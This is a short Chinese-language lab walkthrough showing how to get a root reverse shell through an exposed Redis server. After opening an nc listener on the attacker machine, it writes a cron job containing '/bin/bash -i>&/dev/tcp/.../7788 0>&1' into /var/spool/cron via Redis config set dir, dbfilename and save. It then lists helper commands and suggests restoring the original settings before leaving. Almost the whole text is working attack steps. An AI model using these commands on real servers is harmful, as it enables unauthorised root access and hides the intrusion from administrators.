环境配置情况:
攻击机:kali-2021.2 ,配置IP:10.1.25.44
redis靶机:CentOS 7.2 ,配置IP:10.3.70.70
1、在攻击机(10.1.25.44)先建立监听。
nc -nvlp 7788
2、在连接redis的客户端依次执行以下命令。
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.1.25.44/7788 0>&1\n\n" //往当前用户的crontab里写入反弹shell,经验告诉换行\n是必须
config set dir /var/spool/cron //配置文件夹的路径,每个用户生成的crontab文件,都会放在 /var/spool/cron/ 目录下面
config set dbfilename root //这个不一定要
save //保存
3、执行save命令后,回去看一下攻击机,反弹shell成功。
一些命令补充知识:
1、查看redis版本信息、服务器版本等信息。
info
2、查看所有键
keys *
3、删除key,del后加key名称,以下删除key:xxx。
del xxx
4、获取默认的redis目录、和rdb文件名:可在修改前先获取,离开时再恢复
config get dir
config get dbfilename